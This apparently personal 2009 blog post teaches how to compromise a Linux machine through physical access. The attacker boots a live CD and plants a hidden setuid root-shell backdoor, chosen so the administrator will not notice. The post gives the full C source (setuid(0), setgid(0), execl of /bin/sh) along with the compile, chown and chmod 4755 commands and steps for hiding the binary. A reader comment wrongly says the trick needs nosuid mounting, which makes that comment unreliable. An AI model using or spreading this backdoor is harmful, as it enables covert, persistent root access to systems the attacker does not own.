Thursday, October 8, 2009

setuid backdoor trick

You've got physical access to a linux computer you want to compromise, and you can boot from CD.

There are several ways to get root access to the computer through a linux live cd.
One way is to boot the livecd, chroot to the linux partition, then run a "passwd root". Another way is to add your username to the sudoers list in /etc/sudoers on the linux partition.

The problem with these techniques is that they'll leave footprints that are easily noticeable by the administrator because system files are being modified.

A trick is to create a simple backdoor root shell. Then you'll just have to run the program [as normal user] to get root access. The program can then be located anywhere on the linux partition.

setuid is an access right flag which can be set on a binary.
If it is set, then the program will run as root when it is started until privileges are dropped at a certain point in the program, returning to normal permissions.

This was designed in order to allow a program to use "root" access only when it is needed by the program. This migitates the effects that an exploit will have if the program has any security hole.

Here we're exploiting the fact that a normal user can have root access using a binary with setuid set to create a Shell backdoor.

So the steps are:
1. Boot your live cd.
2. Mount the linux partition with setuid enabled(it's enabled by default)
3. Copy the backdoor to some place accessible by you on the partition.(e.g your home folder)

Here's the source for the tiny backdoor:

//bdoor.c
int main()

{
setuid(0);//set the real,effective,saved uid to 0(root)
setgid(0);//set group id to 0(root)

execl("/bin/sh","sh",0); //execute a shell
return 0;
}
//sniper11

Compile with:
root$ gcc bdoor.c -o bdoor
Then(binary needs to be owned by root):
root$ chown root.root bdoor
finally(set the setuid bit):
root$ chmod 4755 bdoor

You need to compile and do the chmod and chown from your livecd (as root). Then, copy bdoor to your home folder on the target system and you can hide it in any subfolder.

Now, reboot, login as normal user, execute the program to get root access and enjoy XD

as usual, screenshot :):


1 comment:

  1. this works assuming the partition is mounted with the nosuid option, which you can override in /etc/fstab.

    The only issue you might have is with fully crypted fs.

    ReplyDelete